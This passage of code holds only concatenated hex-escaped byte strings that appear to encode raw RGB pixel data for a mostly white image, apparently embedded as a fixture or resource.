+"\xc9\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf6\xf0\xe1\xc6\xa2" +"\xea\xd8\xbf\xf9\xf5\xee\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xf1" +"\xe5\xd5\xe6\xd0\xb2\xe1\xc7\xa3\xf1\xe5\xd6\xfb\xf7\xf3\xfe\xfe" +"\xfd\xfe\xfd\xfc\xfb\xf9\xf5\xfc\xfa\xf8\xf0\xe4\xd4\xf8\xf2\xeb" +"\xfc\xfa\xf7\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfd\xfb\xf9\xfb\xf9" +"\xf6\xf2\xe9\xdd\xfa\xf7\xf3\xf8\xf2\xeb\xfe\xfe\xfd\xff\xff\xff" +"\xfb\xf7\xf2\xe1\xc7\xa3\xe5\xce\xaf\xf0\xe3\xd2\xfe\xfe\xfd\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xe1\xc7" +"\xa3\xeb\xd9\xc1\xfc\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xfd\xfc\xfb\xf4\xea\xdd\xe4\xcc\xab\xf2\xe8\xda" +"\xfd\xfc\xfa\xfe\xfe\xfe\xfd\xfc\xfb\xf8\xf2\xeb\xed\xde\xc8\xe2" +"\xc8\xa6\xea\xd7\xbe\xf5\xed\xe2\xfe\xfe\xfe\xfd\xfc\xfb\xfa\xf7" +"\xf3\xf7\xf2\xea\xf1\xe5\xd6\xf8\xf4\xee\xf9\xf5\xf0\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfb\xfb\xf8\xf4\xe9\xd8\xc1" +"\xec\xdd\xc8\xf9\xf4\xee\xfb\xf9\xf5\xf9\xf3\xed\xe4\xcc\xaa\xe1" +"\xc8\xa5\xe9\xd7\xbd\xfc\xfb\xf8\xfe\xfe\xfe\xff\xff\xff\xfe\xfe" +"\xfe\xf8\xf1\xe8\xe4\xcc\xac\xf7\xf0\xe7\xfe\xfe\xfe\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd0\xb2\xfd\xfb\xf9\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc" +"\xfb\xf3\xea\xdc\xe3\xcb\xa9\xf2\xe8\xda\xfd\xfc\xfa\xfa\xf6\xf1" +"\xf0\xe3\xd2\xe5\xce\xaf\xe7\xd1\xb5\xf3\xe8\xd9\xfc\xf9\xf6\xf9" +"\xf5\xf0\xfa\xf8\xf4\xf7\xf2\xeb\xf7\xf2\xeb\xfb\xf9\xf6\xfa\xf7" +"\xf3\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xff\xff\xff" +"\xff\xff\xff\xf1\xe7\xd8\xf4\xed\xe2\xfb\xf8\xf5\xf9\xf4\xee\xf2" +"\xe6\xd7\xe6\xd1\xb3\xe6\xd0\xb2\xf1\xe6\xd6\xfb\xf8\xf3\xff\xff" +"\xff\xff\xff\xff\xf9\xf5\xef\xe3\xc9\xa6\xf4\xeb\xdf\xfe\xfd\xfd" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xeb\xda" +"\xc2\xe1\xc6\xa1\xf9\xf4\xee\xfd\xfc\xfa\xf7\xf1\xe8\xe3\xca\xa8" 
+"\xe2\xc8\xa5\xea\xd8\xc0\xfb\xf9\xf6\xf9\xf4\xee\xfa\xf7\xf3\xef" +"\xe4\xd3\xf7\xf2\xea\xfb\xf9\xf7\xfe\xfd\xfc\xfe\xfe\xfe\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xfc\xfb\xf8\xfc\xfa\xf7\xf9\xf6\xf1\xf5\xee\xe4\xfb" +"\xf9\xf5\xf7\xf2\xea\xe9\xd6\xbc\xe2\xc8\xa4\xe4\xcc\xaa\xf9\xf4" +"\xed\xfe\xfd\xfc\xfe\xfe\xfe\xea\xd8\xbe\xe1\xc7\xa2\xf2\xe6\xd7" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe3\xcb\xab\xe3\xcb" +"\xa9\xf2\xe7\xd9\xf3\xe9\xdc\xe8\xd4\xb9\xe1\xc7\xa4\xef\xe1\xce" +"\xf7\xf1\xe9\xf8\xf3\xec\xf8\xf3\xed\xef\xe3\xd3\xf6\xf0\xe8\xfb" +"\xf9\xf5\xfe\xfd\xfc\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" +"\xfe\xfd\xfb\xf9\xf6\xf9\xf5\xef\xf0\xe4\xd4\xf6\xef\xe6\xec\xdc" +"\xc7\xe4\xcb\xaa\xe0\xc5\xa0\xf3\xe8\xda\xfa\xf6\xf1\xf0\xe3\xd1" +"\xeb\xda\xc2\xfb\xf9\xf5\xfe\xfe\xfe\xe6\xd1\xb3\xfd\xfc\xfa\xfe" +"\xfe\xfe\xf2\xe7\xd9\xd7\xb4\x84\xd7\xb4\x83\xea\xd7\xbe\xe2\xc9" +"\xa6\xe2\xc9\xa6\xf0\xe3\xd2\xf7\xf2\xeb\xf8\xf3\xed\xf7\xf2\xea" +"\xfd\xfb\xf9\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfb\xf8\xf4\xfb\xf9\xf6\xef\xe3" +"\xd3\xf6\xef\xe6\xf2\xe7\xd9\xe1\xc6\xa2\xe4\xcd\xae\xee\xe0\xcd" +"\xe1\xc6\xa2\xe9\xd5\xba\xfa\xf6\xf1\xe6\xd1\xb3\xfc\xfb\xf9\xf9" +"\xf5\xee\xdc\xbe\x95\xec\xdd\xc8\xe6\xd1\xb4\xe3\xcb\xaa\xe7\xd4" +"\xb9\xf3\xea\xde\xf2\xe7\xd8\xf8\xf2\xeb\xfd\xfc\xfa\xfe\xfe\xfd" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf7" +"\xf3\xfc\xf9\xf6\xf8\xf3\xec\xf0\xe5\xd5\xe9\xd7\xbd\xdf\xc4\x9f" +"\xe3\xca\xa9\xdd\xc0\x98\xe6\xcf\xb2\xe6\xd1\xb3\xf3\xe9\xdb\xe1" +"\xc6\xa1\xd8\xb7\x88\xd3\xaa\x73\xe4\xcc\xab\xf6\xf0\xe7\xf1\xe6" +"\xd7\xf7\xf1\xea\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfa\xfb\xf9\xf6" 
+"\xfc\xfa\xf7\xfb\xf9\xf5\xfd\xfb\xfa\xfd\xfb\xfa\xfd\xfc\xfa\xfd" +"\xfb\xf9\xf6\xf6\xf5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xf7\xf7\xf8\xf2\xf2\xf2\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf9" +"\xf9\xf2\xf3\xf3\xed\xee\xee\xdb\xdc\xdc\xe3\xe3\xe3\xda\xdb\xdb" +"\xe5\xe5\xe5\xf0\xf0\xf0\xee\xee\xee\xda\xda\xda\xed\xed\xed\xfc" +"\xfc\xfc\xd8\xd8\xd8\xf8\xf8\xf8\xec\xec\xed\xe9\xe9\xe9\xde\xde" +"\xde\xe1\xe1\xe2\xdd\xde\xde\xcf\xd0\xd0\xfa\xfa\xfa\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xed\xed" +"\xed\xd8\xd9\xda\xd2\xd3\xd4\xb0\xb1\xb2\xb5\xb6\xb6\xd1\xd2\xd2" +"\xb4\xb4\xb3\xd1\xd1\xd0\xc9\xc9\xc9\xad\xad\xad\xcc\xcd\xcd\xf5" +"\xf5\xf5\xbf\xbf\xbf\xdf\xdf\xde\x9d\x9d\x9d\xb6\xb7\xb7\xc6\xc7" +"\xc7\xc6\xc7\xc7\xcc\xcc\xcc\xc9\xc9\xca\xf3\xf3\xf3\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xfa" +"\xfa\xea\xea\xea\xe9\xe9\xe9\xe5\xe5\xe5\xec\xec\xec\xe0\xe1\xe1" +"\xdb\xdb\xdb\xe0\xe1\xe0\xe8\xe8\xe8\xe1\xe1\xe1\xf1\xf1\xf1\xfd" +"\xfd\xfd\xd5\xd5\xd5\xec\xec\xec\xf4\xf4\xf4\xf1\xf1\xf1\xe4\xe4" +"\xe4\xe7\xe7\xe6\xc8\xc9\xc9\xd7\xd7\xd7\xf9\xf9\xf9\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" +"\xfe\xfe\xf7\xf7\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xf5\xf5\xf5\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 